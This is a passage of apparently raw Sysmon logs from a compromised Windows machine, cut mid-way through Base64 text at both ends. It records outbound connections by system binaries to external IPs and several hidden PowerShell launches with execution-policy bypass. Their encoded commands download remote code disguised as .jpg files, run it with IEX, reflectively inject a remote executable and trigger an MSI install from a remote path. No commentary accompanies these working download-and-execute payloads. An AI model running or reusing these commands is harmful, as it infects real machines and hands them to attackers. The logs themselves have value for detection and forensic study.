QBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA

[Sysmon Event type 3]
Image C:\Windows\System32\msdtc.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 193.108.118.167
DestinationHostname 167-118-108-193.clients.gthost.com
DestinationPort 443
DestinationPortName https

[Sysmon Event type 3]
Image C:\Windows\System32\wusa.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 193.108.118.167
DestinationHostname 167-118-108-193.clients.gthost.com
DestinationPort 443
DestinationPortName https

[Sysmon Event type 3]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User Ricky-PC\Ricky
Protocol tcp e
DestinationIp 172.64.109.8
DestinationHostname
DestinationPort 443
DestinationPortName https

[Sysmon Event type 3]
Image C:\Windows\System32\wusa.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 38.75.137.14
DestinationHostname
DestinationPort 9000
DestinationPortName

[Sysmon Event type 1]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe” powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEANQAwADUAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMQAuAGoAcABnACcAKQANAAoA

[Sysmon Event type 1]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEANQAwADUAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA
CurrentDirectory C:\Users\Ricky\Desktop\
User Ricky-PC\Ricky
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe” powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEANQAwADUAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcA